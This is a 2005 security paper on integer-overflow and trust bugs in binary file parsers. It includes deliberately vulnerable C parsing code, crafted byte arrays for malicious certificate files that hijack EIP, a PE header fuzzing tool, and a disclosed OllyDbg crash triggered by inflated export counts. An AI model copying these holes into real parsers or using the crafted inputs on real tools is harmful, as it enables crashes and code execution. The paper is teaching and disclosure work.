Analyzing Common Binary Parser Mistakes Orlando Padilla xbud@g0thead.com Last modified: 12/05/2005 Abstract: With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise. No new attacks will be presented in this document, as examples and an example file format will be presented to demonstrate an insecure implementation of a parsing library. As a bonus for reading this article, an undisclosed bug in a popular debugger will be released during the case study material of this paper. This vulnerability, if leveraged properly, will cause the debugger to crash during the loading of a binary executable or dynamic library. Disclaimer: This document is written with an educational interest and I cannot be held liable for any outcome of the information being released. Thanks: #vax, nologin, and jimmy haffa = Introduction A number of papers have already been written describing the exploitation of integer overflows, however, very few publications have been aimed at the exploitation of integer overflows within binary parsers. The current slew of advisories released by iDefense (Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format bugs should be enough to take these bugs seriously. The most common mistake applied by a programmer is in trusting a field inside a binary structure that should not be trusted. During the design phase: efficiency, simplicity and the secure implementation of a particular project should be at the top of the priority list. When dealing with data that cannot be presented only as strings, a length field is required to tell the application when to stop reading. When dealing with sections that must have subsections, knowing ahead of time how many sections are embedded within the primary section of a structure is required and again, a value must be used to instruct the application only to iterate x number of times. In the following paragraphs, the description of a binary file structure will be presented, followed by applied examples of typical coding errors encountered when auditing applications. An overview of integer overflows will be discussed for the sake of completeness. Finally, a case study of several bugs found during the research of a particular file format will be shown. = Certificate Storage File The following file format was designed and written specifically for this article and has no real world applicable use. The general idea behind the implementation of this file format is to create a single binary file acting as a searchable database for certificate files. The file will consist of two core structures, which will hold the information necessary to parse the certificates in DER format. This is a rough diagram of what the file looks like after compilation: +----------------------+-----------+---------+ | Structure | Offset | Size | +----------------------+-----------+---------+ | OP Header | 0 | 4 | | Element Count | 4 | 2 | | Cert File Fmt Struct | 6 | 6 | | Cert Data Struct | 12 | 16 | | Cert 1 | | | | Cert 2 | | | | Cert | | | | Cert n | | | +----------------------+-----------+---------+ = Binary Layout The following structures are defined on the file format's compiler library. typedef struct _CERTFF { unsigned int NumberOfCerts; unsigned short PointerToCerts; }CERTFF,*PCERTFF; typedef struct _CERTDATA { char Name[8]; unsigned short CertificateLen; unsigned short PointerToDERs; unsigned char *DataPtr; }CERTDATA,*PCERTDATA; The first data structure consists of two unsigned integers, (short) NumberOfCerts and (long) PointerToCerts. These hold the number of certificates in total, stored in this binary NumberOfCerts and the offset from the beginning of the file to the first certificate data structure CERTDATA PointerToCerts. We can already assume that a parser will iterate through the image file NumberOfCerts times, starting from PointerToCerts in chunks of the size of CERTDATA at a time. The second data structure consists of a character array 8 bytes in size, which is used to hold the first 7 characters of a certificate's description, followed by two unsigned short integers which hold the length of the certificate referred to by this structure, and the offset to the beginning of the certificate respectively. The last element is an unsigned char, which is used to carry the body of the certificate by the compiler. = Applied Examples As the number of buffer overflows decreases, the number of integer overflows and improper file and binary protocol parsing bugs increases. The following URL query to OSVDB's (Open Source Vulnerability) database for integer overflows is a perfect example of the diversity of applications affected. The list is rather short considering the number of vulnerabilities actually released in the past two - three years. Still, it accurately displays different levels of severity: Kernel, Library, Protocol and file format bugs. http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search As a proof of concept, I developed a parsing library for the construct above. See Appendix A for code. The code functionality is simple. As explained above it consolidates certificates (in this example) into a single file. There are several bugs in the library that I mocked from actual implementations of different open source and closed source applications. The first vulnerability exists in the single cert extraction tool 'certextract.c'. The issue is pretty obvious; the library trusts that the file being parsed has not been tampered with. The following code snippet highlights the issue: igned char cert_out[MAX_CERT_SIZE]; 16 unsigned char *extract_cert = "req1.DER"; ... 64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert)); 65 66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen); ... The vulnerability exists because the library assumes the certificates will not be larger than MAX_CERT_SIZE due to the compiler's inability to take files larger than the set size. All an attacker has to do is modify the file using an external editor or reverse engineering the file format and creating a malicious certificate db. A step-by-step example on exploitation of this bug is out of the scope of this document, but let's look at what has to be done to prepare an exploit for this vulnerability. We already know we have to modify the length field to something larger than MAX_CERT_SIZE or if we look specifically at 'certlib.h', larger than 2048 bytes. Looking at the structure of the headers, we can see that each certificate has its own length field. So creating a valid structure header and placing it at a correct offset along with a corresponding payload should do the trick. With this in mind, calculate the number of bytes from the beginning of the file to the first certificate. [SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct] It seems we can drop our fake structure after the 12th byte. The cert structure will look something like the following (depending on the size of the payload you are using): unsigned char exploit_dat1[] = { /* Name of our fake cert */ 0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00, /* our, length */ 0x53, 0x08, /* where we can write our data, PointerToDer*/ 0x18, 0x00, /* DataPtr just for completion */ 0x00, 0x00, 0x00, 0x00 }; Notice the length is an unsigned short integer that limits our payload to 0xFFFF (65535), which should be more than enough space. The two most important sections of our structure are the length, and the value we give PointerToDer since this will point to the beginning of our payload. Since we are choosing to make our fake certificate the first one on the list, anything below it can be overwritten with little concern. At offset 0x18 of the dat file we have 0x0853 bytes of A's, notice there is no bounds check on this value. Below is a sample run of a valid certsdb.dat file and a second sample run with our malicious dat file. (xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER cert req1.DE len: 657 PtrToData: 90 (xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER e3e45e30b18a6fc9f6134f0297485cc1 req1.DER e3e45e30b18a6fc9f6134f0297485cc1 out.DER (gdb) r ./badcertdb.dat out.DER Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER cert req1.DE len: 2131 PtrToData: 27 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () The actual exploitation of this vulnerability is left as an exercise for the reader, given the file structure necessary to build the attack it is now trivial to complete. = Continuing Applied Examples The utility 'certdb2der.c' provided in this example suite iterates through the dat file and dumps the contents of each certificate into individual files. The CERTFF (Certificate File Format) structure contains an element called NumberOfCerts of type unsigned int. This integer explicitly controls the loop iterator, controlling the number of CERTDATA structures said to be in the body of dat file. 59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT); 60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA); 61 62 pCertData = (PCERTDATA)malloc(alloc_size); 63 64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1); An integer overflow condition may be triggered during memory allocation for the 'pCertData' array of structures. If a specially crafted dat file contains a high enough value during memory allocation, pCertDat array is deemed inproper by the multiplication in line 60 (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA). The maximum value for an unsigned integer is (4294967295) or 0xffffffff, so when the value at NumberOfCerts is multiplied by sizeof(CERTDATA) or 16 bytes an overflow occurs causing the value to wrap resulting in an invocation negative malloc() or a malloc(0). This could then be leveraged into executing arbitrary code on certain malloc implementations by overwriting control structures in the heap. Again, exploitation is not covered in detail, but pre-exploitation is explained below. Please refer to the references section for papers covering heap overflow exploitation. Constructing a fake valid CERTFF chunk and properly placing it in a dat file will be what most of the work consists of when preparing for file format exploit. The first 6 bytes of our file will remain the same, so we can assume our exploit to look something to the following: [ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...] [SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ] unsigned char exploit_dat1[] = { /* header info */ 0x4f, 0x50, 0x00, 0x00, 0x01, 0x00, /* our length followed by our certs pointer */ 0xff, 0xff, 0xff, 0xff, 0x0a, 0x00, /* One valid cert */ 0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00, /* our length */ 0x00, 0x07, /* where we can write our data to PointerToDer*/ 0x00, 0x26, /* DataPtr useless to us */ 0x00, 0x00, 0x00, 0x00, }; unsigned char exploit_dat2[] = { /* fake certs for fill */ 0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00, /* our length */ 0x00, 0x10, /* where we can write our data to PointerToDer*/ 0x26, 0x04, /* DataPtr useless to us */ 0x00, 0x00, 0x00, 0x00, }; The pseudo code below denotes the structure of the rest of the binary dat file. for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2)) memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2)); In short, the code copies the contents of our second structure , after the 24th byte till the end of the buffer is reached. The following displays an iteration of the utility used correctly, followed by an iteration through the malicious certificates db file. (xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat req1.DE of length: 657 is being written to disk... req2.DE of length: 649 is being written to disk... req3.DE of length: 653 is being written to disk... req4.DE of length: 651 is being written to disk... req5.DE of length: 652 is being written to disk... (xbud@yakuza <~/code/random>) $ (gdb) r 2badcertdb.dat Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat Program received signal SIGSEGV, Segmentation fault. 0xb7e1267f in memcpy () from /lib/tls/libc.so.6 (gdb) x/i $pc 0xb7e1267f : repz movsl %ds:(%esi),%es:(%edi) (gdb)i reg eax 0xffffffff -1 ecx 0x3fff9c02 1073716226 edx 0x804a008 134520840 ... Reconstructing our memcpy(buf,edx (our fake certs), eax (-1)), the value stored in eax is -1 which when converted to unsigned inside memcpy, 4GB of data are copied into our destination buffer of only 0x800 bytes in size. = Case Study = The Microsoft PE/COFF Headers There a number of documents and tools out there that explain the structure of Microsoft's infamous PE (Portable Executable) and old Unix Style COFF (Common Object File Format) header. As such, I will refrain from elaborating on what each element inside each structure does. Instead, I will focus on the critical sections that may allow an attacker to alter the contents of header elements specifically to break implementations of PE/COFF parsers. With that in mind we can now begin our journey into the world of PE. At file offset 0x3C as specified in MS's pecoff.doc, there is a four byte signature PE, immediately after the signature of the image file, there is a standard COFF header of the following format: IMAGE_FILE_HEADER //(Coff) { unsigned short Machine; unsigned short NumberOfSections; unsigned int TimeDateStamp; unsigned int PointerToSymbolTable; unsigned int NumberOfSymbols; unsigned short SizeOfOptionalHeader; unsigned short Characteristics; } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; Does anything look similar to our hypothetical file format used in the examples above? NumberOfSections and NumberOfSymbols are all synonymous to NumberOfCerts with respect to their own file format. These elements, along with SizeOfOptionalHeader make for interesting attack vectors. Before strolling further along into the COFF Header specifics, it is important to pay a bit more attention to the offset 0x3C being referred to in the PECOFF.doc document. It states that the file offset specified at offset 0x3C from the image file, points to the PE signature. What would happen if this file offset was bogus? What if the offset at offset 0x3C points to fstat(image).st_size + 1 ? We cause the parser to access illegal memory. This bug was present in the majority of the PE Viewers tested. Although the significance of this bug is minimal since the modified binary will no longer execute, picture a scenario where an attacker simply needs to crash an application which happens to preprocess a PE Header? All an attacker must do to trigger this bug is build a fake MZ header also known as a Dos Stub header and invalidate the 0x3C offset. The MS-DOS Stub is a valid application that runs under MS-DOS and is placed at the front of the .EXE image. The linker places a default stub here, which prints out the message "This program cannot be run in DOS mode" when the image is run in MS-DOS. The second element, NumberOfSections, indicates the number of Section Headers this file has mapped. Once again, fuzzing this element with random numbers yields interesting results on tools like, MSVC dumpbin.exe, PEView, PE Explorer, msfpescan etc... Continuing our dive into PE madness, following the COFF Header there is an OPTIONAL_HEADER also referred to as the PE Header which consists of the following elements: _IMAGE_OPTIONAL_HEADER32 { unsigned short Magic; ... unsigned int ImageBase; ... unsigned short MajorOperatingSystemVersion; unsigned short MinorOperatingSystemVersion; ... unsigned int SizeOfImage; unsigned int SizeOfHeaders; ... unsigned int LoaderFlags; unsigned int NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; There were a number of elements omitted here for the sake of brevity, most of which aid the loader in identifying the type of file and its core mappings. Please refer to the appendix for more information on what each specific element means. Again, several elements in this structure look interesting enough to play with, however we will only be looking at the IMAGE_DATA_DIRECTORY array of entries. In particular, the first index of that directory contains a pointer to the structures. The element EXPORT/IMPORT_DIRECTORY_TABLE NumberOfRvaAndSizes in the structure above refers to the number of elements in the DataDirectory array. The following is the structure which is the last structure fuzzed for this case study. _EXPORT_DIRECTORY_TABLE { unsigned long Characteristics; unsigned long TimeDateStamp; unsigned short MajorVersion; unsigned short MinorVersion; unsigned long NameRVA; unsigned long OrdinalBase; unsigned long NumberOfFunctions; unsigned long NumberOfNames; unsigned long ExportAddressTableRVA; unsigned long ExportNameTableRVA; unsigned long ExportOrdinalTableRVA; } EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE; The Export Directory Table contains address information that is used to resolve fix-up references to the entry points within this image. The elements NumberOfFunctions, NumberOfNames indicate the obvious and again if something trusts the number in this structure without error checking, unexpected results can occur. = Introducing breakdance.c Although file fuzzing is relatively simple, tools help reduce the amount of time it takes for you to reconstruct a format to reach deep into a section buried within several structures. I typically use xxd -i, hd (hexdump), or shred (hexeditor) for windows to reconstruct a binary image and fuzz the structures manually, but I decided to develop a tool to do the work for me in the case of PE. The following options are available: Usage: ./breakdance [parameters] Options: -v verbose -o [file] File to write to (defaults) out.ext -f [file] File to read from -e [value] Modify Export Directory Table's number of functions and number of names -p Print sections of a PE file and exit -c Create new section (.pepe) not to be used with -m -s [section] Section to overwrite (can be used with -c) -m [section] [value] -n [length] Fuzz Export Directory Table's Strings Modify [section] with [int] where: section is one of [image_start] [number_of_sections] ex. ./breakdance -v -o out -f pebin -m "image_start" 65536 ex. ./breakdance -v -o out -f pebin -c -s .rdata [Warning if -o option isn't provided with mod options, changes are discarded] The following is a list of binary parsers affected by the fuzzing options provided by breakdance.c, the list is by no means comprehensive in the sense of PE parsers but it is all I test against. The fuzzing capabilities are rather minimal considering the number of structures and elements accompanied by the PE/COFF specification, however it is enough to demonstrate how broken, binary parsers can be. +--------------+-----------------+-------------------+ | Tool Name | Vendor | Section | +--------------+-----------------+-------------------+ | PE View | Wayne Radburn | All | | MSVS bindump | Microsoft | All | | OllyDbg | Oleh Yuschuk | NumberOfFunctions | | PE Explorer | Haeventools.com | NumberOfSections | +--------------+-----------------+-------------------+ = Affected Toolsets Although I can almost guarantee other parsers are just as buggy, this selection is pretty well known and should suffice as a demonstration. The only issue I will elaborate on is the OllyDebug denial of service attack. This issue is interesting due to the fact that even after modifying the PE Image to DoS OllyDebug, the binary itself is still executable. This can be leveraged as an attack vector against reverse engineerers who rely on olly debug to reverse binaries. The following is a run of breakdance against a DLL. (xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \ /home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll ... NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647 Dumping 348160 bytes (xbud@yakuza <~/code/random>) $ -- Inside WinDbg -- This exception may be expected and handled. eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000 eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293 *** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\tools\odbg110\OLLYDBG.EXE - OLLYDBG!Createlistwindow+0x1bb4: 0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=???? 0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4 00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b = Conclusions The general rule of thumb here is not to trust any user modifiable data. The trust between application and input components such as sockets, file I/O, named pipes etc. should always be minimal and at an extreme, should be considered dangerous. The fact that a file format specification exists is not an excuse to assume all data gathered from an alleged file is valid. Validate your input against a working ruleset, and if the assertion fails, raise an exception. Keeping your code simple means accept only valid input, deny all variants. All the code referenced is provided in the attached tar ball, a safer version of the library for parsing the hypothetical file format developed for this paper is included for demonstration purposes. = Bibliography OSVDB. OSVDB Advisory Descriptions http://www.osvdb.org Microsoft Corporation. PECoff Specification http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx blexim. Integer Overflows http://www.phrack.org/show.php?p=60&a=10